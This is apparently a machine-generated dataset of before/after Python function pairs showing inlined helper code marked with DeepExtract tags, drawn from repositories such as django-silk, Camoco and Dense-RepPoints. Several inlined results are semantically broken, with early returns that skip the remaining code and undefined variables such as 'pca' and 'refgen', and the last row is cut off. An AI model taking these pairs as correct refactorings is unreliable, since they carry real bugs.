| before (string, lengths 0–955k) | after (string, lengths 0–877k) | repo (string, lengths 1–74) | type (string, 1 class) |
|---|---|---|---|
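The rows below pair a `before` snippet, in which inlined code is wrapped in `<DeepExtract>` / `</DeepExtract>` marker lines, with an `after` snippet that appears to be the same code with those marker lines stripped, plus the source `repo` and a `type` label. A minimal sketch of that relationship (the helper name is an illustrative assumption, not part of the dataset):

```python
def strip_deepextract_markers(before: str) -> str:
    """Drop the <DeepExtract>/</DeepExtract> marker lines while keeping the
    code they wrap; judging from the rows below, this is what the `after`
    column holds for each `before` cell."""
    kept = [
        line
        for line in before.splitlines()
        if line.strip() not in ("<DeepExtract>", "</DeepExtract>")
    ]
    return "\n".join(kept)

# Expected (not guaranteed) invariant for each row shown below:
#   strip_deepextract_markers(row["before"]) == row["after"]
```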
def _cv_ml(self):
<DeepExtract>
X_dist = norm_along_axis_1(self.X_train, self.X_train, norm_dim=True)
avg_num_neighbors = np.mean(np.ma.masked_where(X_dist > self.epsilon, X_dist).count(axis=1)) - 1
bw = 1.06 * self.y_std * avg_num_neighbors ** (-1.0 / (4 + self.ndim_y))
</DeepExtract>
x0 = np.concatenate([bw, np.array([self.epsilon])], axis=0)
def loologli(x):
assert x.shape[0] == self.ndim_y + 1
bw = x[:self.ndim_y]
eps = float(x[self.ndim_y])
return -self.loo_likelihood(bw, epsilon=eps)
x_opt = optimize.fmin(loologli, x0=x0, maxiter=_MAX_ITER_CV_ML_OPTIMIZER, disp=0)
(bw_opt, eps_opt) = (x_opt[:self.ndim_y], x_opt[self.ndim_y])
return (bw_opt, eps_opt)
|
def _cv_ml(self):
X_dist = norm_along_axis_1(self.X_train, self.X_train, norm_dim=True)
avg_num_neighbors = np.mean(np.ma.masked_where(X_dist > self.epsilon, X_dist).count(axis=1)) - 1
bw = 1.06 * self.y_std * avg_num_neighbors ** (-1.0 / (4 + self.ndim_y))
x0 = np.concatenate([bw, np.array([self.epsilon])], axis=0)
def loologli(x):
assert x.shape[0] == self.ndim_y + 1
bw = x[:self.ndim_y]
eps = float(x[self.ndim_y])
return -self.loo_likelihood(bw, epsilon=eps)
x_opt = optimize.fmin(loologli, x0=x0, maxiter=_MAX_ITER_CV_ML_OPTIMIZER, disp=0)
(bw_opt, eps_opt) = (x_opt[:self.ndim_y], x_opt[self.ndim_y])
return (bw_opt, eps_opt)
|
Conditional_Density_Estimation
|
positive
|
@force_fp32(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))
def loss(self, cls_scores, bbox_preds, centernesses, gt_bboxes, gt_labels, img_metas, cfg, gt_bboxes_ignore=None):
assert len(cls_scores) == len(bbox_preds) == len(centernesses)
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
<DeepExtract>
mlvl_points = []
for i in range(len(featmap_sizes)):
mlvl_points.append(self.get_points_single(featmap_sizes[i], self.strides[i], bbox_preds[0].dtype, bbox_preds[0].device))
all_level_points = mlvl_points
</DeepExtract>
<DeepExtract>
assert len(all_level_points) == len(self.regress_ranges)
num_levels = len(all_level_points)
expanded_regress_ranges = [all_level_points[i].new_tensor(self.regress_ranges[i])[None].expand_as(all_level_points[i]) for i in range(num_levels)]
concat_regress_ranges = torch.cat(expanded_regress_ranges, dim=0)
concat_points = torch.cat(all_level_points, dim=0)
num_points = [center.size(0) for center in all_level_points]
(labels_list, bbox_targets_list) = multi_apply(self.fcos_target_single, gt_bboxes, gt_labels, points=concat_points, regress_ranges=concat_regress_ranges, num_points_per_lvl=num_points)
labels_list = [labels.split(num_points, 0) for labels in labels_list]
bbox_targets_list = [bbox_targets.split(num_points, 0) for bbox_targets in bbox_targets_list]
concat_lvl_labels = []
concat_lvl_bbox_targets = []
for i in range(num_levels):
concat_lvl_labels.append(torch.cat([labels[i] for labels in labels_list]))
concat_lvl_bbox_targets.append(torch.cat([bbox_targets[i] for bbox_targets in bbox_targets_list]))
(labels, bbox_targets) = (concat_lvl_labels, concat_lvl_bbox_targets)
</DeepExtract>
num_imgs = cls_scores[0].size(0)
flatten_cls_scores = [cls_score.permute(0, 2, 3, 1).reshape(-1, self.cls_out_channels) for cls_score in cls_scores]
flatten_bbox_preds = [bbox_pred.permute(0, 2, 3, 1).reshape(-1, 4) for bbox_pred in bbox_preds]
flatten_centerness = [centerness.permute(0, 2, 3, 1).reshape(-1) for centerness in centernesses]
flatten_cls_scores = torch.cat(flatten_cls_scores)
flatten_bbox_preds = torch.cat(flatten_bbox_preds)
flatten_centerness = torch.cat(flatten_centerness)
flatten_labels = torch.cat(labels)
flatten_bbox_targets = torch.cat(bbox_targets)
flatten_points = torch.cat([points.repeat(num_imgs, 1) for points in all_level_points])
pos_inds = flatten_labels.nonzero().reshape(-1)
num_pos = len(pos_inds)
loss_cls = self.loss_cls(flatten_cls_scores, flatten_labels, avg_factor=num_pos + num_imgs)
pos_bbox_preds = flatten_bbox_preds[pos_inds]
pos_centerness = flatten_centerness[pos_inds]
if num_pos > 0:
pos_bbox_targets = flatten_bbox_targets[pos_inds]
<DeepExtract>
left_right = pos_bbox_targets[:, [0, 2]]
top_bottom = pos_bbox_targets[:, [1, 3]]
centerness_targets = left_right.min(dim=-1)[0] / left_right.max(dim=-1)[0] * (top_bottom.min(dim=-1)[0] / top_bottom.max(dim=-1)[0])
pos_centerness_targets = torch.sqrt(centerness_targets)
</DeepExtract>
pos_points = flatten_points[pos_inds]
pos_decoded_bbox_preds = distance2bbox(pos_points, pos_bbox_preds)
pos_decoded_target_preds = distance2bbox(pos_points, pos_bbox_targets)
loss_bbox = self.loss_bbox(pos_decoded_bbox_preds, pos_decoded_target_preds, weight=pos_centerness_targets, avg_factor=pos_centerness_targets.sum())
loss_centerness = self.loss_centerness(pos_centerness, pos_centerness_targets)
else:
loss_bbox = pos_bbox_preds.sum()
loss_centerness = pos_centerness.sum()
return dict(loss_cls=loss_cls, loss_bbox=loss_bbox, loss_centerness=loss_centerness)
|
@force_fp32(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))
def loss(self, cls_scores, bbox_preds, centernesses, gt_bboxes, gt_labels, img_metas, cfg, gt_bboxes_ignore=None):
assert len(cls_scores) == len(bbox_preds) == len(centernesses)
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
mlvl_points = []
for i in range(len(featmap_sizes)):
mlvl_points.append(self.get_points_single(featmap_sizes[i], self.strides[i], bbox_preds[0].dtype, bbox_preds[0].device))
all_level_points = mlvl_points
assert len(all_level_points) == len(self.regress_ranges)
num_levels = len(all_level_points)
expanded_regress_ranges = [all_level_points[i].new_tensor(self.regress_ranges[i])[None].expand_as(all_level_points[i]) for i in range(num_levels)]
concat_regress_ranges = torch.cat(expanded_regress_ranges, dim=0)
concat_points = torch.cat(all_level_points, dim=0)
num_points = [center.size(0) for center in all_level_points]
(labels_list, bbox_targets_list) = multi_apply(self.fcos_target_single, gt_bboxes, gt_labels, points=concat_points, regress_ranges=concat_regress_ranges, num_points_per_lvl=num_points)
labels_list = [labels.split(num_points, 0) for labels in labels_list]
bbox_targets_list = [bbox_targets.split(num_points, 0) for bbox_targets in bbox_targets_list]
concat_lvl_labels = []
concat_lvl_bbox_targets = []
for i in range(num_levels):
concat_lvl_labels.append(torch.cat([labels[i] for labels in labels_list]))
concat_lvl_bbox_targets.append(torch.cat([bbox_targets[i] for bbox_targets in bbox_targets_list]))
(labels, bbox_targets) = (concat_lvl_labels, concat_lvl_bbox_targets)
num_imgs = cls_scores[0].size(0)
flatten_cls_scores = [cls_score.permute(0, 2, 3, 1).reshape(-1, self.cls_out_channels) for cls_score in cls_scores]
flatten_bbox_preds = [bbox_pred.permute(0, 2, 3, 1).reshape(-1, 4) for bbox_pred in bbox_preds]
flatten_centerness = [centerness.permute(0, 2, 3, 1).reshape(-1) for centerness in centernesses]
flatten_cls_scores = torch.cat(flatten_cls_scores)
flatten_bbox_preds = torch.cat(flatten_bbox_preds)
flatten_centerness = torch.cat(flatten_centerness)
flatten_labels = torch.cat(labels)
flatten_bbox_targets = torch.cat(bbox_targets)
flatten_points = torch.cat([points.repeat(num_imgs, 1) for points in all_level_points])
pos_inds = flatten_labels.nonzero().reshape(-1)
num_pos = len(pos_inds)
loss_cls = self.loss_cls(flatten_cls_scores, flatten_labels, avg_factor=num_pos + num_imgs)
pos_bbox_preds = flatten_bbox_preds[pos_inds]
pos_centerness = flatten_centerness[pos_inds]
if num_pos > 0:
pos_bbox_targets = flatten_bbox_targets[pos_inds]
left_right = pos_bbox_targets[:, [0, 2]]
top_bottom = pos_bbox_targets[:, [1, 3]]
centerness_targets = left_right.min(dim=-1)[0] / left_right.max(dim=-1)[0] * (top_bottom.min(dim=-1)[0] / top_bottom.max(dim=-1)[0])
pos_centerness_targets = torch.sqrt(centerness_targets)
pos_points = flatten_points[pos_inds]
pos_decoded_bbox_preds = distance2bbox(pos_points, pos_bbox_preds)
pos_decoded_target_preds = distance2bbox(pos_points, pos_bbox_targets)
loss_bbox = self.loss_bbox(pos_decoded_bbox_preds, pos_decoded_target_preds, weight=pos_centerness_targets, avg_factor=pos_centerness_targets.sum())
loss_centerness = self.loss_centerness(pos_centerness, pos_centerness_targets)
else:
loss_bbox = pos_bbox_preds.sum()
loss_centerness = pos_centerness.sum()
return dict(loss_cls=loss_cls, loss_bbox=loss_bbox, loss_centerness=loss_centerness)
|
Dense-RepPoints
|
positive
|
@torch.no_grad()
def test(data_set, backbone, batch_size, nfolds=10):
print('testing verification..')
data_list = data_set[0]
issame_list = data_set[1]
embeddings_list = []
time_consumed = 0.0
for i in range(len(data_list)):
data = data_list[i]
embeddings = None
ba = 0
while ba < data.shape[0]:
bb = min(ba + batch_size, data.shape[0])
count = bb - ba
_data = data[bb - batch_size:bb]
time0 = datetime.datetime.now()
img = (_data / 255 - 0.5) / 0.5
net_out = backbone(img)
_embeddings = net_out.detach().cpu().numpy()
time_now = datetime.datetime.now()
diff = time_now - time0
time_consumed += diff.total_seconds()
if embeddings is None:
embeddings = np.zeros((data.shape[0], _embeddings.shape[1]))
embeddings[ba:bb, :] = _embeddings[batch_size - count:, :]
ba = bb
embeddings_list.append(embeddings)
_xnorm = 0.0
_xnorm_cnt = 0
for embed in embeddings_list:
for i in range(embed.shape[0]):
_em = embed[i]
_norm = np.linalg.norm(_em)
_xnorm += _norm
_xnorm_cnt += 1
_xnorm /= _xnorm_cnt
embeddings = embeddings_list[0].copy()
embeddings = sklearn.preprocessing.normalize(embeddings)
acc1 = 0.0
std1 = 0.0
embeddings = embeddings_list[0] + embeddings_list[1]
embeddings = sklearn.preprocessing.normalize(embeddings)
print(embeddings.shape)
print('infer time', time_consumed)
<DeepExtract>
thresholds = np.arange(0, 4, 0.01)
embeddings1 = embeddings[0::2]
embeddings2 = embeddings[1::2]
(tpr, fpr, accuracy, best_thresholds, bad_case) = calculate_roc(thresholds, embeddings1, embeddings2, np.asarray(issame_list), nrof_folds=nfolds, pca=pca)
(_, _, accuracy, val, val_std, far) = (tpr, fpr, accuracy, best_thresholds, bad_case)
</DeepExtract>
(acc2, std2) = (np.mean(accuracy), np.std(accuracy))
return (acc1, std1, acc2, std2, _xnorm, embeddings_list)
|
@torch.no_grad()
def test(data_set, backbone, batch_size, nfolds=10):
print('testing verification..')
data_list = data_set[0]
issame_list = data_set[1]
embeddings_list = []
time_consumed = 0.0
for i in range(len(data_list)):
data = data_list[i]
embeddings = None
ba = 0
while ba < data.shape[0]:
bb = min(ba + batch_size, data.shape[0])
count = bb - ba
_data = data[bb - batch_size:bb]
time0 = datetime.datetime.now()
img = (_data / 255 - 0.5) / 0.5
net_out = backbone(img)
_embeddings = net_out.detach().cpu().numpy()
time_now = datetime.datetime.now()
diff = time_now - time0
time_consumed += diff.total_seconds()
if embeddings is None:
embeddings = np.zeros((data.shape[0], _embeddings.shape[1]))
embeddings[ba:bb, :] = _embeddings[batch_size - count:, :]
ba = bb
embeddings_list.append(embeddings)
_xnorm = 0.0
_xnorm_cnt = 0
for embed in embeddings_list:
for i in range(embed.shape[0]):
_em = embed[i]
_norm = np.linalg.norm(_em)
_xnorm += _norm
_xnorm_cnt += 1
_xnorm /= _xnorm_cnt
embeddings = embeddings_list[0].copy()
embeddings = sklearn.preprocessing.normalize(embeddings)
acc1 = 0.0
std1 = 0.0
embeddings = embeddings_list[0] + embeddings_list[1]
embeddings = sklearn.preprocessing.normalize(embeddings)
print(embeddings.shape)
print('infer time', time_consumed)
thresholds = np.arange(0, 4, 0.01)
embeddings1 = embeddings[0::2]
embeddings2 = embeddings[1::2]
(tpr, fpr, accuracy, best_thresholds, bad_case) = calculate_roc(thresholds, embeddings1, embeddings2, np.asarray(issame_list), nrof_folds=nfolds, pca=pca)
(_, _, accuracy, val, val_std, far) = (tpr, fpr, accuracy, best_thresholds, bad_case)
(acc2, std2) = (np.mean(accuracy), np.std(accuracy))
return (acc1, std1, acc2, std2, _xnorm, embeddings_list)
|
cavaface.pytorch
|
positive
|
@classmethod
def from_DataFrame(cls, df, name, description, chrom_col='chrom', start_col='start', stop_col='stop', id_col='ID'):
"""
Imports a RefGen object from a CSV.
"""
self = cls.create(name, description, type='RefGen')
genes = list()
for (i, row) in df.iterrows():
genes.append(Gene(row[chrom_col], int(row[start_col]), int(row[stop_col]), id=row[id_col]).update(dict(row.items())))
<DeepExtract>
if isinstance(genes, Locus):
self.db.cursor().execute('\n INSERT OR REPLACE INTO genes VALUES (?,?,?,?)\n ', (genes.name, genes.chrom, genes.start, genes.end))
self.db.cursor().executemany('\n INSERT OR REPLACE INTO gene_attrs VALUES (?,?,?)\n ', [(genes.id, key, val) for (key, val) in genes.attr.items()])
if refgen:
aliases = refgen.aliases(genes.id)
if aliases:
self.db.cursor().executemany('\n INSERT OR IGNORE INTO aliases VALUES (?,?)', [(al, id) for al in aliases])
else:
genes = list(genes)
self.log('Adding {} Genes info to database'.format(len(genes)))
cur = self.db.cursor()
cur.execute('BEGIN TRANSACTION')
cur.executemany('INSERT OR REPLACE INTO genes VALUES (?,?,?,?)', ((genes.name, genes.chrom, genes.start, genes.end) for genes in genes))
self.log('Adding Gene attr info to database')
cur.executemany('INSERT OR REPLACE INTO gene_attrs VALUES (?,?,?)', ((genes.id, key, val) for genes in genes for (key, val) in genes.attr.items()))
if refgen:
al_map = refgen.aliases([genes.id for genes in genes])
als = []
for (id, al_list) in al_map.items():
for al in al_list:
als.append([al, id])
cur.executemany('INSERT OR REPLACE INTO aliases VALUES (?,?)', als)
cur.execute('END TRANSACTION')
</DeepExtract>
<DeepExtract>
self.log('Building Indices')
cur = self.db.cursor()
cur.execute('\n CREATE INDEX IF NOT EXISTS gene_start_end ON genes (chromosome,start DESC, end ASC, id);\n CREATE INDEX IF NOT EXISTS gene_end_start ON genes (chromosome,end DESC,start DESC,id);\n CREATE INDEX IF NOT EXISTS gene_start ON genes (chromosome,start);\n CREATE INDEX IF NOT EXISTS gene_end ON genes (chromosome,end);\n CREATE INDEX IF NOT EXISTS geneid ON genes (id);\n CREATE INDEX IF NOT EXISTS geneattr ON gene_attrs (id);\n CREATE INDEX IF NOT EXISTS id ON func(id);\n CREATE INDEX IF NOT EXISTS id ON ortho_func(id);\n ')
</DeepExtract>
return self
|
@classmethod
def from_DataFrame(cls, df, name, description, chrom_col='chrom', start_col='start', stop_col='stop', id_col='ID'):
"""
Imports a RefGen object from a CSV.
"""
self = cls.create(name, description, type='RefGen')
genes = list()
for (i, row) in df.iterrows():
genes.append(Gene(row[chrom_col], int(row[start_col]), int(row[stop_col]), id=row[id_col]).update(dict(row.items())))
if isinstance(genes, Locus):
self.db.cursor().execute('\n INSERT OR REPLACE INTO genes VALUES (?,?,?,?)\n ', (genes.name, genes.chrom, genes.start, genes.end))
self.db.cursor().executemany('\n INSERT OR REPLACE INTO gene_attrs VALUES (?,?,?)\n ', [(genes.id, key, val) for (key, val) in genes.attr.items()])
if refgen:
aliases = refgen.aliases(genes.id)
if aliases:
self.db.cursor().executemany('\n INSERT OR IGNORE INTO aliases VALUES (?,?)', [(al, id) for al in aliases])
else:
genes = list(genes)
self.log('Adding {} Genes info to database'.format(len(genes)))
cur = self.db.cursor()
cur.execute('BEGIN TRANSACTION')
cur.executemany('INSERT OR REPLACE INTO genes VALUES (?,?,?,?)', ((genes.name, genes.chrom, genes.start, genes.end) for genes in genes))
self.log('Adding Gene attr info to database')
cur.executemany('INSERT OR REPLACE INTO gene_attrs VALUES (?,?,?)', ((genes.id, key, val) for genes in genes for (key, val) in genes.attr.items()))
if refgen:
al_map = refgen.aliases([genes.id for genes in genes])
als = []
for (id, al_list) in al_map.items():
for al in al_list:
als.append([al, id])
cur.executemany('INSERT OR REPLACE INTO aliases VALUES (?,?)', als)
cur.execute('END TRANSACTION')
self.log('Building Indices')
cur = self.db.cursor()
cur.execute('\n CREATE INDEX IF NOT EXISTS gene_start_end ON genes (chromosome,start DESC, end ASC, id);\n CREATE INDEX IF NOT EXISTS gene_end_start ON genes (chromosome,end DESC,start DESC,id);\n CREATE INDEX IF NOT EXISTS gene_start ON genes (chromosome,start);\n CREATE INDEX IF NOT EXISTS gene_end ON genes (chromosome,end);\n CREATE INDEX IF NOT EXISTS geneid ON genes (id);\n CREATE INDEX IF NOT EXISTS geneattr ON gene_attrs (id);\n CREATE INDEX IF NOT EXISTS id ON func(id);\n CREATE INDEX IF NOT EXISTS id ON ortho_func(id);\n ')
return self
|
Camoco
|
positive
|
def pretty_print_config_to_json(self, services, hostname=None):
"""Description of a protorpc.remote.Service in API format.
Args:
services: Either a single protorpc.remote.Service or a list of them
that implements an api/version.
hostname: string, Hostname of the API, to override the value set on the
current service. Defaults to None.
Returns:
string, The API descriptor document as JSON.
"""
if not isinstance(services, (tuple, list)):
services = [services]
<DeepExtract>
if services is None:
if not False:
raise TypeError('%s is None, which is not allowed.' % 'services')
return services
if not isinstance(services, (tuple, list)):
raise TypeError('%s is not a list.' % 'services')
if not all((isinstance(i, remote._ServiceClass) for i in services)):
type_list = list(set((type(setting) for setting in services)))
raise TypeError("%s contains types that don't match %s: %s" % ('services', remote._ServiceClass.__name__, type_list))
return services
</DeepExtract>
<DeepExtract>
merged_api_info = self.__get_merged_api_info(services)
descriptor = self.get_descriptor_defaults(merged_api_info, hostname=hostname)
description = merged_api_info.description
if not description and len(services) == 1:
description = services[0].__doc__
if description:
descriptor['description'] = description
auth_descriptor = self.__auth_descriptor(merged_api_info)
if auth_descriptor:
descriptor['auth'] = auth_descriptor
frontend_limit_descriptor = self.__frontend_limit_descriptor(merged_api_info)
if frontend_limit_descriptor:
descriptor['frontendLimits'] = frontend_limit_descriptor
method_map = {}
method_collision_tracker = {}
rest_collision_tracker = {}
for service in services:
remote_methods = service.all_remote_methods()
for (protorpc_meth_name, protorpc_meth_info) in remote_methods.iteritems():
method_info = getattr(protorpc_meth_info, 'method_info', None)
if method_info is None:
continue
method_id = method_info.method_id(service.api_info)
self.__id_from_name[protorpc_meth_name] = method_id
method_map[method_id] = self.__method_descriptor(service, service.__name__, method_info, protorpc_meth_name, protorpc_meth_info)
if method_id in method_collision_tracker:
raise ApiConfigurationError('Method %s used multiple times, in classes %s and %s' % (method_id, method_collision_tracker[method_id], service.__name__))
else:
method_collision_tracker[method_id] = service.__name__
rest_identifier = (method_info.http_method, method_info.get_path(service.api_info))
if rest_identifier in rest_collision_tracker:
raise ApiConfigurationError('%s path "%s" used multiple times, in classes %s and %s' % (method_info.http_method, method_info.get_path(service.api_info), rest_collision_tracker[rest_identifier], service.__name__))
else:
rest_collision_tracker[rest_identifier] = service.__name__
if method_map:
descriptor['methods'] = method_map
descriptor['descriptor'] = self.__schema_descriptor(services)
descriptor = descriptor
</DeepExtract>
return json.dumps(descriptor, sort_keys=True, indent=2)
|
def pretty_print_config_to_json(self, services, hostname=None):
"""Description of a protorpc.remote.Service in API format.
Args:
services: Either a single protorpc.remote.Service or a list of them
that implements an api/version.
hostname: string, Hostname of the API, to override the value set on the
current service. Defaults to None.
Returns:
string, The API descriptor document as JSON.
"""
if not isinstance(services, (tuple, list)):
services = [services]
if services is None:
if not False:
raise TypeError('%s is None, which is not allowed.' % 'services')
return services
if not isinstance(services, (tuple, list)):
raise TypeError('%s is not a list.' % 'services')
if not all((isinstance(i, remote._ServiceClass) for i in services)):
type_list = list(set((type(setting) for setting in services)))
raise TypeError("%s contains types that don't match %s: %s" % ('services', remote._ServiceClass.__name__, type_list))
return services
merged_api_info = self.__get_merged_api_info(services)
descriptor = self.get_descriptor_defaults(merged_api_info, hostname=hostname)
description = merged_api_info.description
if not description and len(services) == 1:
description = services[0].__doc__
if description:
descriptor['description'] = description
auth_descriptor = self.__auth_descriptor(merged_api_info)
if auth_descriptor:
descriptor['auth'] = auth_descriptor
frontend_limit_descriptor = self.__frontend_limit_descriptor(merged_api_info)
if frontend_limit_descriptor:
descriptor['frontendLimits'] = frontend_limit_descriptor
method_map = {}
method_collision_tracker = {}
rest_collision_tracker = {}
for service in services:
remote_methods = service.all_remote_methods()
for (protorpc_meth_name, protorpc_meth_info) in remote_methods.iteritems():
method_info = getattr(protorpc_meth_info, 'method_info', None)
if method_info is None:
continue
method_id = method_info.method_id(service.api_info)
self.__id_from_name[protorpc_meth_name] = method_id
method_map[method_id] = self.__method_descriptor(service, service.__name__, method_info, protorpc_meth_name, protorpc_meth_info)
if method_id in method_collision_tracker:
raise ApiConfigurationError('Method %s used multiple times, in classes %s and %s' % (method_id, method_collision_tracker[method_id], service.__name__))
else:
method_collision_tracker[method_id] = service.__name__
rest_identifier = (method_info.http_method, method_info.get_path(service.api_info))
if rest_identifier in rest_collision_tracker:
raise ApiConfigurationError('%s path "%s" used multiple times, in classes %s and %s' % (method_info.http_method, method_info.get_path(service.api_info), rest_collision_tracker[rest_identifier], service.__name__))
else:
rest_collision_tracker[rest_identifier] = service.__name__
if method_map:
descriptor['methods'] = method_map
descriptor['descriptor'] = self.__schema_descriptor(services)
descriptor = descriptor
return json.dumps(descriptor, sort_keys=True, indent=2)
|
AndroidGCMTutorial
|
positive
|
def generate_vis_amp_time_series(df, sourL='def', polarL=['RR', 'LL'], exptL='def', out_path='def', min_elem=200):
from eat.inspect import closures as cl
import os
if out_path == 'def':
out_path = 'Closures_timeseries/'
if not os.path.exists(out_path):
os.makedirs(out_path)
if sourL == 'def':
sourL = list(df.source.unique())
if exptL == 'def':
exptL = list(df.expt_no.unique())
if 'band' not in df.columns:
df['band'] = ''
bandL = list(df.band.unique())
if 'mjd' not in df.columns:
<DeepExtract>
df['mjd'] = Time(list(df.datetime)).mjd
df = df
</DeepExtract>
baseL = list(df.baseline.unique())
amp_path = out_path + 'AMP/'
if not os.path.exists(amp_path):
os.makedirs(amp_path)
for sour in sourL:
for expt in exptL:
for band in bandL:
for polar in polarL:
foo = df
for base in baseL:
foo2 = foo[(foo.source == sour) & (foo.polarization == polar) & (foo.expt_no == expt) & (foo.band == band) & (foo.baseline == base)]
if np.shape(foo2)[0] > min_elem:
namef = 'amp_pha_' + base + '_' + sour + '_' + polar + '_' + band + '.txt'
print(namef)
print(np.shape(foo2)[0], [np.min(foo2.mjd), np.max(foo2.mjd)])
foo3 = foo2[['mjd', 'amp', 'phase', 'sigma']]
foo3.to_csv(amp_path + namef, sep=' ', index=False, header=False)
|
def generate_vis_amp_time_series(df, sourL='def', polarL=['RR', 'LL'], exptL='def', out_path='def', min_elem=200):
from eat.inspect import closures as cl
import os
if out_path == 'def':
out_path = 'Closures_timeseries/'
if not os.path.exists(out_path):
os.makedirs(out_path)
if sourL == 'def':
sourL = list(df.source.unique())
if exptL == 'def':
exptL = list(df.expt_no.unique())
if 'band' not in df.columns:
df['band'] = ''
bandL = list(df.band.unique())
if 'mjd' not in df.columns:
df['mjd'] = Time(list(df.datetime)).mjd
df = df
baseL = list(df.baseline.unique())
amp_path = out_path + 'AMP/'
if not os.path.exists(amp_path):
os.makedirs(amp_path)
for sour in sourL:
for expt in exptL:
for band in bandL:
for polar in polarL:
foo = df
for base in baseL:
foo2 = foo[(foo.source == sour) & (foo.polarization == polar) & (foo.expt_no == expt) & (foo.band == band) & (foo.baseline == base)]
if np.shape(foo2)[0] > min_elem:
namef = 'amp_pha_' + base + '_' + sour + '_' + polar + '_' + band + '.txt'
print(namef)
print(np.shape(foo2)[0], [np.min(foo2.mjd), np.max(foo2.mjd)])
foo3 = foo2[['mjd', 'amp', 'phase', 'sigma']]
foo3.to_csv(amp_path + namef, sep=' ', index=False, header=False)
|
eat
|
positive
|
def mets_event(digiprov_id, event_type, event_detail='', event_outcome_detail_note='', agent_type='storage service', agent_value=None):
"""
Create and return a PREMIS:EVENT.
"""
now = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
if agent_value is None:
<DeepExtract>
agent_value = 'Archivematica Storage Service-%s' % ss_version
</DeepExtract>
EP = ElementMaker(namespace=NSMAP['premis'], nsmap={'premis': NSMAP['premis']})
EM = ElementMaker(namespace=NSMAP['mets'], nsmap={'mets': NSMAP['mets']})
premis_event = EP.event(EP.eventIdentifier(EP.eventIdentifierType('UUID'), EP.eventIdentifierValue(str(uuid.uuid4()))), EP.eventType(event_type), EP.eventDateTime(now), EP.eventDetail(event_detail), EP.eventOutcomeInformation(EP.eventOutcome(), EP.eventOutcomeDetail(EP.eventOutcomeDetailNote(event_outcome_detail_note))), EP.linkingAgentIdentifier(EP.linkingAgentIdentifierType(agent_type), EP.linkingAgentIdentifierValue(agent_value)), version='2.2')
premis_event.set('{' + NSMAP['xsi'] + '}schemaLocation', 'info:lc/xmlns/premis-v2 http://www.loc.gov/standards/premis/v2/premis-v2-2.xsd')
digiprov_event = EM.digiprovMD(EM.mdWrap(EM.xmlData(premis_event), MDTYPE='PREMIS:EVENT'), ID=digiprov_id)
return digiprov_event
|
def mets_event(digiprov_id, event_type, event_detail='', event_outcome_detail_note='', agent_type='storage service', agent_value=None):
"""
Create and return a PREMIS:EVENT.
"""
now = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
if agent_value is None:
agent_value = 'Archivematica Storage Service-%s' % ss_version
EP = ElementMaker(namespace=NSMAP['premis'], nsmap={'premis': NSMAP['premis']})
EM = ElementMaker(namespace=NSMAP['mets'], nsmap={'mets': NSMAP['mets']})
premis_event = EP.event(EP.eventIdentifier(EP.eventIdentifierType('UUID'), EP.eventIdentifierValue(str(uuid.uuid4()))), EP.eventType(event_type), EP.eventDateTime(now), EP.eventDetail(event_detail), EP.eventOutcomeInformation(EP.eventOutcome(), EP.eventOutcomeDetail(EP.eventOutcomeDetailNote(event_outcome_detail_note))), EP.linkingAgentIdentifier(EP.linkingAgentIdentifierType(agent_type), EP.linkingAgentIdentifierValue(agent_value)), version='2.2')
premis_event.set('{' + NSMAP['xsi'] + '}schemaLocation', 'info:lc/xmlns/premis-v2 http://www.loc.gov/standards/premis/v2/premis-v2-2.xsd')
digiprov_event = EM.digiprovMD(EM.mdWrap(EM.xmlData(premis_event), MDTYPE='PREMIS:EVENT'), ID=digiprov_id)
return digiprov_event
|
archivematica-storage-service
|
positive
|
def process_response(self, request, response):
if getattr(request, 'silk_is_intercepted', False):
while True:
try:
<DeepExtract>
Logger.debug('Process response')
with silk_meta_profiler():
collector = DataCollector()
collector.stop_python_profiler()
silk_request = collector.request
if silk_request:
ResponseModelFactory(response).construct_response_model()
silk_request.end_time = timezone.now()
collector.finalise()
else:
Logger.error('No request model was available when processing response. Did something go wrong in process_request/process_view?\n' + str(request) + '\n\n' + str(response))
if silk_request:
silk_request.save()
Logger.debug('Process response done.')
</DeepExtract>
except (AttributeError, DatabaseError):
Logger.debug('Retrying _process_response')
<DeepExtract>
Logger.debug('Process response')
with silk_meta_profiler():
collector = DataCollector()
collector.stop_python_profiler()
silk_request = collector.request
if silk_request:
ResponseModelFactory(response).construct_response_model()
silk_request.end_time = timezone.now()
collector.finalise()
else:
Logger.error('No request model was available when processing response. Did something go wrong in process_request/process_view?\n' + str(request) + '\n\n' + str(response))
if silk_request:
silk_request.save()
Logger.debug('Process response done.')
</DeepExtract>
finally:
break
return response
|
def process_response(self, request, response):
if getattr(request, 'silk_is_intercepted', False):
while True:
try:
Logger.debug('Process response')
with silk_meta_profiler():
collector = DataCollector()
collector.stop_python_profiler()
silk_request = collector.request
if silk_request:
ResponseModelFactory(response).construct_response_model()
silk_request.end_time = timezone.now()
collector.finalise()
else:
Logger.error('No request model was available when processing response. Did something go wrong in process_request/process_view?\n' + str(request) + '\n\n' + str(response))
if silk_request:
silk_request.save()
Logger.debug('Process response done.')
except (AttributeError, DatabaseError):
Logger.debug('Retrying _process_response')
Logger.debug('Process response')
with silk_meta_profiler():
collector = DataCollector()
collector.stop_python_profiler()
silk_request = collector.request
if silk_request:
ResponseModelFactory(response).construct_response_model()
silk_request.end_time = timezone.now()
collector.finalise()
else:
Logger.error('No request model was available when processing response. Did something go wrong in process_request/process_view?\n' + str(request) + '\n\n' + str(response))
if silk_request:
silk_request.save()
Logger.debug('Process response done.')
finally:
break
return response
|
django-silk
|
positive
|
def commandTroops():
for (index, friend) in enumerate(hero.findFriends()):
if friend.type == 'paladin':
<DeepExtract>
if friend.canCast('heal'):
if hero.health < hero.maxHealth * 0.6:
target = self
if target:
hero.command(friend, 'cast', 'heal', target)
else:
target = hero.findNearestEnemy()
hero.command(friend, 'attack', target)
</DeepExtract>
elif friend.type == 'soldier' or friend.type == 'archer':
<DeepExtract>
target = hero.findNearestEnemy()
if target:
hero.command(friend, 'attack', target)
</DeepExtract>
|
def commandTroops():
for (index, friend) in enumerate(hero.findFriends()):
if friend.type == 'paladin':
if friend.canCast('heal'):
if hero.health < hero.maxHealth * 0.6:
target = self
if target:
hero.command(friend, 'cast', 'heal', target)
else:
target = hero.findNearestEnemy()
hero.command(friend, 'attack', target)
elif friend.type == 'soldier' or friend.type == 'archer':
